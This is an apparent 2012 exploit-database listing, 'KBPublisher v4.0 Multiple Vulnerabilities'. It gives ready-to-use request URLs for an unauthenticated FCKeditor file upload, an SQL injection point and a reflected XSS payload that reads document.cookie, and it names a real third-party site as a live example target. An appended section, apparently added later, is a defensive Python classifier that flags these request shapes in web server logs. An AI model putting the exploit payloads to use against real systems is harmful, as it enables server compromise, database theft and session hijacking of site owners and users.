KBPublisher v4.0 Multiple Vulnerabilities

2012-06-07T00:00:00
ID 1337DAY-ID-18467
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
KBPublisher v4.0 Multiple Vulnerabilities
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.kbpublisher.com/
.:. Tested On Demo : http://demo.kbpublisher.com/kb/admin
#######################################################################

===[ Exploit ]===


Remote Arbitrary File Upload
=============================

http://SITE/admin/tools/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://SITE/admin/tools/FCKeditor/editor/filemanager/connectors/php/connector.php

Your File:
http://SITE/images/image/


SQL Injection
==============

http://SITE/admin/index.php?module=knowledgebase&page=kb_entry&action=update&id=191[sql]


Reflected XSS
==============


https://SITE/?&sid="><script>alert(document.cookie)</script>

Example:

https://wfsm.webfarm.co.nz/kb/?&sid="><script>alert(document.cookie)</script>


####################################################################### 
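
For defenders checking web server logs for the three request shapes listed above, a small classifier follows. It is an added example, not part of the original advisory; the rule names, the sample request lines, the script-extension list and the assumption that a legitimate sid contains only [A-Za-z0-9,-] are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Patterns taken from the request shapes in the advisory above.
FCK_PATH = re.compile(r"/FCKeditor/editor/filemanager/", re.I)
# Script files under the upload directory (extension list is an assumption).
UPLOADED_SCRIPT = re.compile(r"/images/image/.*\.(?:php\d?|phtml|phar)$", re.I)
NUMERIC = re.compile(r"[0-9]+")
# Assumption: a legitimate sid only contains PHP session-id characters.
SID_OK = re.compile(r"[A-Za-z0-9,-]+")

# Constructed request targets (path + query as logged); not real traffic.
SAMPLE_REQUESTS = [
    "/kb/admin/index.php?module=knowledgebase&page=kb_entry&action=update&id=191",
    "/kb/admin/index.php?module=knowledgebase&page=kb_entry&action=update&id=191%27",
    "/kb/admin/tools/FCKeditor/editor/filemanager/connectors/php/connector.php?Type=Image",
    "/kb/?&sid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/kb/?&sid=3f2a9c0e1b7d4a55",
    "/kb/images/image/logo.png",
    "/kb/images/image/x.php",
]


def classify(target):
    """Return the sorted rule names (hypothetical labels) matching one request."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    params = parse_qs(parts.query)  # values are percent-decoded here
    hits = set()
    if FCK_PATH.search(path):
        hits.add("fckeditor-filemanager")
    if UPLOADED_SCRIPT.search(path):
        hits.add("script-in-upload-dir")
    if "kb_entry" in params.get("page", []):
        if any(not NUMERIC.fullmatch(v) for v in params.get("id", [])):
            hits.add("kb_entry-nonnumeric-id")
    if any(not SID_OK.fullmatch(v) for v in params.get("sid", [])):
        hits.add("sid-unexpected-chars")
    return sorted(hits)


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req) or ["ok"], req)
```

A hit on the FCKeditor rule from an unauthenticated client, or any script file served from the image upload directory, is the highest-priority result to review.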


